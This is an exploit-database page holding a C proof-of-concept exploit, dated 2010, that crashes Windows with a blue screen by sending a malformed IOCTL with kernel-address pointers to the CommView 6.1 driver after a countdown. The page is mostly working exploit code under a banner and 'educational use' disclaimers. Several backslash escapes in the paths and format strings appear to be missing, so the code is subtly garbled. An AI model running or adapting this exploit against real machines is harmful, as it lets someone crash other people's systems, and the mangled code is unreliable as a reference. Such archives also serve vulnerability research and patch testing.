[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD)
# Published : 2010-04-23
# Author : p4r4N0ID
# Previous Title : MacOS X 10.6 HFS File System Attack (Denial of Service)
# Next Title : OpenSSL remote DoS 


/*-------------------------------------------------------------------------*/
/**
# Exploit Title : CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD)   
# Corelan       : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030
# Date          : April 23rd, 2010
# Author        : p4r4N0ID (T.B)
# Bug found by  : p4r4N0ID (T.B)
# Software Link : http://www.tamos.com/download/main/
# Version       : Version 6.1 (Build 636)
# OS            : Windows
# Tested on     : Windows XP sp2 En (VMWARE)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
**/
/*--------------------------------------------------------------------------*/

#include <windows.h>
#include <stdio.h>


VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}


int __cdecl main( int argc , char * argv[])
{
	HANDLE		hDevice;
	DWORD       junk;
	int i = 10;

	system("cls");	
	printf ("|------------------------------------------------------------------|");
	printf ("|                         __               __                      |");
	printf ("|   _________  ________  / /___ _____     / /____  ____ _____ ___  |");
	printf ("|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |");
	printf ("| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |");
	printf ("| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |");
	printf ("|                                                                  |");
	printf ("|                                       http://www.corelan.be:8800 |");
	printf ("|                                              security@corelan.be |");
	printf ("|                                                                  |");
	printf ("|-------------------------------------------------[ EIP Hunters ]--|");
	printf ("[+] CommView Local Denial Of Service (BSOD) - by p4r4N0ID(T.B)");


	//CHANGE the GUID so it match your device name
	//find it in:  HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersInterfaces{GUID}
	
	hDevice = CreateFileA("\\.\CV2K_{916BB164-6D0D-45C0-B6C2-79B42A522C17}",
						   0,
						   FILE_SHARE_READ | FILE_SHARE_WRITE,
						   NULL,
						   OPEN_EXISTING,
						   0,
						   NULL);


	if (hDevice == INVALID_HANDLE_VALUE)
	{
		   ShowError();
		   return EXIT_FAILURE;
	}


	printf("nntt[!] Started Countdown");

	for(i;i>=1;i--)
	{
		printf("r -[ %d ]- ",i);

		if(i==1) printf("n[+] Bye Bye, BOOM!!!");
		Sleep(1000);
	} 

	DeviceIoControl(hDevice, 
					0x00002578, 
					(LPVOID) 0x80000001,
					0,
					(LPVOID) 0x80000002,
					0,
					&junk,  
					(LPOVERLAPPED)NULL);


	return EXIT_SUCCESS;


}